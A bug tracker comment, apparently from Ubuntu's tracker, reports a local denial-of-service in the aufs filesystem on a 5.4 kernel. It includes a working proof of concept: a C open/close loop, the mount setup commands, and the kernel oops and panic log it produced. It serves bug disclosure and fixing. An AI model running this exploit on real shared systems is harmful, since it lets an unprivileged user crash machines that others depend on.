Comment 8 for bug 1873074

Exploit / Local:
---

The local exploit is trivial as 'mount | grep aufs' says
whether there's an aufs mountpoint, and usually there is
a file that is 'chmod o+r' that any user could read/open.

(This crashed a virtual machine in 8 hours, overnight.)
See section 'Exploit / Local' below.

Code:

    $ cat <<EOF >exploit.c
    #include <fcntl.h>
    #include <unistd.h>
    int main() { while (!close(open("test", O_RDONLY))); return 0; }
    EOF

    $ gcc -o /tmp/exploit exploit.c

Setup:

    $ mkdir dir mnt
    $ touch dir/test
    $ sudo mount -t aufs -o br=dir none mnt

    $ ls mnt
    test

Run:

    $ cd mnt && /tmp/exploit
    <just let it run until..>

    [29167.866016] kernel BUG at include/linux/fs.h:2963!
    [29167.867423] invalid opcode: 0000 [#1] SMP PTI
    [29167.868584] CPU: 0 PID: 5314 Comm: exploit Tainted: G OE 5.4.0-21-generic #25-Ubuntu
    [29167.870751] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.12.0-1 04/01/2014
    [29167.873202] RIP: 0010:__fput+0x25d/0x260
    ...
    [29167.901583] Call Trace:
    [29167.902387] ____fput+0xe/0x10
    [29167.903344] task_work_run+0x8f/0xb0
    [29167.904420] exit_to_usermode_loop+0x131/0x160
    [29167.905749] do_syscall_64+0x163/0x190
    [29167.906929] entry_SYSCALL_64_after_hwframe+0x44/0xa9
    ...
    [29167.967808] Kernel panic - not syncing: Fatal exception

(uptime = 29167 seconds / 3600 seconds/hour = 8.10 hours)